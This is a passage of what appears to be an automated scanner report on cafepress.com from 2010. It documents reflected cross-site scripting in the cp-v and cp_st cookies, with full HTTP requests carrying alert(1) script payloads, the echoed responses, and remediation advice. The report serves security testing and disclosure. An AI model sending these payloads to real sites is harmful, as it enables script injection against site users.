__utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 93186 Date: Sun, 26 Dec 2010 13:46:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93186 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.7. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1f9d</script><script>alert(1)</script>c7da687b934 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b1f9d</script><script>alert(1)</script>c7da687b934 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 93236 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'ProductDetails' window.cafepress.tealeaf.searchTerm = 'b1f9d</script><script>alert(1)</script>c7da687b934 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.8. http://www.cafepress.com/+aprons [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f815"-alert(1)-"690539d6541 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+aprons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 60358 Date: Sun, 26 Dec 2010 13:47:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/ Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60358 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.9. http://www.cafepress.com/+aprons [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87e97</script><script>alert(1)</script>edc3d2d6805 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+aprons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=87e97</script><script>alert(1)</script>edc3d2d6805 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 60380 Date: Sun, 26 Dec 2010 13:47:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60380 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '87e97</script><script>alert(1)</script>edc3d2d6805 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.10. http://www.cafepress.com/+baby-blanket [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+baby-blanket
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60566"-alert(1)-"db88db638f9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 58705 Date: Sun, 26 Dec 2010 13:47:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58705 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.11. http://www.cafepress.com/+baby-blanket [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+baby-blanket
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b770e</script><script>alert(1)</script>35f226fbd0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b770e</script><script>alert(1)</script>35f226fbd0 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
